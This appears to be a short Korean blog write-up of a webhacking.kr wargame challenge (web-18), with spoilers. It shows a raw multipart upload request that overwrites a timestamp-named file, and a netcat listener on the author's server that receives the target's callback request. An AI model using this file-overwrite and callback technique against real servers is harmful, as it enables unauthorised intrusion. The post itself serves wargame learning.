타임스템프에 해당되는 파일 생성 이후
사용자가 업로드한 팡ㄹ을 생성해서 덮어씌우면
POST /challenge/web/web-18/index.php HTTP/1.1
Host: webhacking.kr
Proxy-Connection: keep-alive
Content-Length: 201
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webhacking.kr
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
HTTPS: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKkJG4iYFhMBuVlI7
Referer: http://webhacking.kr/challenge/web/web-18/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=a6rn2bf68d9bg96imssrg0qsj7; oldzombie=1
X-dotNet-Beautifier: 803; DO-NOT-REMOVE
------WebKitFormBoundaryKkJG4iYFhMBuVlI7
Content-Disposition: form-data; name="upfile"; filename="tmp-1437704995"
Content-Type: text/html
52.69.246.182
------WebKitFormBoundaryKkJG4iYFhMBuVlI7--
ubuntu@ip-172-30-0-53:~$ nc -l 7777
GET /05cc6666ca3c323ee2a91fdff98435ec HTTP/1.0
Host: 52.69.246.182
GET /05cc6666ca3c323ee2a91fdff98435ec HTTP/1.0
Host: 52.69.246.182
ubuntu@ip-172-30-0-53:~$
'Hacking > Webhacking.kr(스포주의)' 카테고리의 다른 글
| Webhacking.kr 45 (0) | 2016.01.15 |
|---|---|
| Webhacking.kr 30 (0) | 2016.01.15 |
| Webhacking.kr 61 (0) | 2016.01.15 |
| Webhacking.kr 5 (0) | 2016.01.15 |
| Webhacking.kr 49 (0) | 2016.01.15 |